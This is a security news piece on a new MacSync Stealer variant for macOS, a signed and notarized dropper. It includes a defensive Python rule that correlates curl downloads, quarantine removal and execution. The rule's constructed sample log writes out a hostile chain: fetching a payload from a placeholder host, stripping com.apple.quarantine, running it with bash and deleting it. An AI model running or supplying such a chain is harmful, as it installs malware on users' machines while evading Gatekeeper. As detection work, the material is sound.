Reworked MacSync Stealer Adopts Quieter Installation Process

by CybrGPT

A new macOS malware sample that passes itself off as a legitimately signed application has been uncovered during routine threat monitoring.

The malware, a reworked version of the MacSync Stealer, departs from earlier delivery methods and adopts a quieter, more automated installation process.

The sample was detected by Jamf Threat Labs while reviewing alerts triggered by its internal YARA rules.

Technical Observations From Analysis

Unlike previous MacSync Stealer variants, which relied on user interaction via ClickFix or Terminal-based tricks, this version arrives as a Swift application that is both code-signed with a developer certificate and notarized by Apple, so Gatekeeper lets it launch without the unidentified-developer warning that unsigned apps trigger. It is distributed inside a disk image posing as a messaging app installer and requires no command-line involvement from the victim.

Once launched, the application silently retrieves an encoded script from a remote server and executes it through a helper component. Jamf noted that similar techniques have recently appeared in other macOS infostealers, including newer versions of Odyssey.

Despite being signed and notarized, the installer still displayed instructions prompting users to right-click and select Open, the long-standing workaround for the Gatekeeper warning on unsigned or un-notarized apps. A notarized app does not need it. Note that macOS Sequoia removed that Control-click override; users must now approve a blocked app under System Settings > Privacy & Security, so the instruction itself is becoming a less reliable social-engineering lever.

Inspection confirmed the application was built as a universal Mach-O binary (Intel and Apple silicon slices) and signed under a developer certificate that, at the time of discovery, had not been revoked.

The disk image stood out for its unusually large size of 25.5 MB, inflated with decoy files such as unrelated PDF documents.

Detection rates varied. Some samples uploaded to VirusTotal were flagged by only one security engine, while others were identified by up to thirteen. Most detections classified the files as generic downloaders.


Jamf later reported the associated developer certificate to Apple, which has since revoked it. Revocation causes Gatekeeper to block fresh launches of the signed app once a Mac can reach Apple's revocation check, but it does nothing for machines the second-stage payload has already run on.

How the Dropper Operates

The Swift-based dropper performs several checks before executing its payload, including:

  • Verifying internet connectivity before proceeding

  • Enforcing a minimum interval of around 3600 seconds (one hour) between runs

  • Downloading the payload with a modified curl command intended to evade detection

  • Removing the com.apple.quarantine attribute from the downloaded file and validating it before execution

The malware runs largely in memory and cleans up temporary files after execution, leaving minimal traces behind. Its behavior mirrors previous MacSync Stealer campaigns once the second-stage payload is deployed.
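The sequence above (download with curl, strip the quarantine flag, execute, delete) is the part of the dropper's behaviour that is easiest to catch from process telemetry. As an added example, not Jamf's code and not taken from the sample, here is a small correlation rule in Python over a constructed, hypothetical process-event log. The log format, field names, hosts and paths are all invented for illustration; a real EDR schema will differ.

```python
"""Correlate curl download -> quarantine strip -> execution of the same file under one
parent process. Constructed example: the log format below is a hypothetical,
simplified process-event stream, not any product's schema and not the malware."""
import re
import shlex
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Event:
    ts: int      # seconds since epoch
    pid: int
    ppid: int
    argv: list   # command line split shell-style

# Constructed format, one process execution per line (hypothetical):
#   <ts> pid=<n> ppid=<n> cmd=<shell-quoted command line>
LINE_RE = re.compile(r"^(\d+) pid=(\d+) ppid=(\d+) cmd=(.*)$")


def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError("unparseable line: %r" % line)
    return Event(int(m[1]), int(m[2]), int(m[3]), shlex.split(m[4]))


def curl_output(argv):
    """Path written by a curl invocation (-o/--output), else None."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "curl":
        return None
    for i, a in enumerate(argv):
        if a in ("-o", "--output") and i + 1 < len(argv):
            return argv[i + 1]
        if a.startswith("--output="):
            return a.split("=", 1)[1]
    return None


def quarantine_stripped(argv):
    """Path whose quarantine flag is removed via `xattr -d com.apple.quarantine <p>`
    or cleared wholesale via `xattr -c <p>`, else None."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "xattr":
        return None
    if ("-d" in argv and "com.apple.quarantine" in argv) or "-c" in argv:
        return argv[-1]
    return None


def detect(lines, window=3600):
    """One alert per (parent, path) where the same parent curl'd a file, stripped its
    quarantine flag and then executed it (directly or via an interpreter) within
    `window` seconds. A later `rm` of the path by that parent is recorded as cleanup."""
    events = sorted((parse_line(line) for line in lines), key=lambda e: e.ts)
    by_parent = defaultdict(list)
    for e in events:
        by_parent[e.ppid].append(e)

    alerts = []
    for ppid, evs in by_parent.items():
        downloaded, stripped, alerted = {}, {}, {}
        for e in evs:
            p = curl_output(e.argv)
            if p:
                downloaded[p] = e.ts
                continue
            p = quarantine_stripped(e.argv)
            if p and p in downloaded:
                stripped[p] = e.ts
                continue
            if e.argv and e.argv[0].rsplit("/", 1)[-1] == "rm":
                for path in alerted:
                    if path in e.argv:
                        alerted[path]["removed"] = True
                continue
            # execution: the downloaded path appears as the program or as an argument
            target = next((a for a in e.argv if a in stripped), None)
            if target and e.ts - downloaded[target] <= window:
                alerted[target] = {"ppid": ppid, "path": target,
                                   "dwell_s": e.ts - downloaded[target],
                                   "removed": False}
        alerts.extend(alerted.values())
    return alerts


# Constructed sample log (hypothetical pids, paths and host; example.invalid is a reserved name).
SAMPLE_LOG = [
    "1700000000 pid=612 ppid=501 cmd=/usr/bin/curl -s -A 'Mozilla/5.0' -o /tmp/.u7 https://example.invalid/p",
    "1700000001 pid=613 ppid=501 cmd=/usr/bin/xattr -d com.apple.quarantine /tmp/.u7",
    "1700000002 pid=614 ppid=501 cmd=/bin/bash /tmp/.u7",
    "1700000003 pid=615 ppid=501 cmd=/bin/rm -f /tmp/.u7",
    # benign: a user downloads a PDF and never strips quarantine or runs it
    "1700000100 pid=700 ppid=300 cmd=/usr/bin/curl -o /Users/me/report.pdf https://example.invalid/r.pdf",
    # benign: a developer clears quarantine on a file this shell did not download
    "1700000200 pid=701 ppid=300 cmd=/usr/bin/xattr -d com.apple.quarantine /Users/me/build/tool",
    "1700000201 pid=702 ppid=300 cmd=/Users/me/build/tool --version",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Only the first parent trips the rule; the developer's `xattr -d` on a file it did not download does not. Two caveats for real telemetry: a dropper can remove the attribute through the removexattr(2) call directly instead of spawning `xattr`, so an event source that records extended-attribute file operations is needed to see that path, and keying on the parent's code-signing identity and executable path is more robust than keying on ppid alone.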

“While MacSync Stealer itself is not entirely new, this case highlights how its authors continue to evolve their delivery methods,” Jamf Threat Labs said.

“This shift in distribution reflects a broader trend across the macOS malware landscape, where attackers increasingly attempt to sneak their malware into executables that are signed and notarized, allowing them to look more like legitimate applications. By leveraging these techniques, adversaries reduce the chances of being detected early on.”

Image credit: Nanain / Shutterstock.com
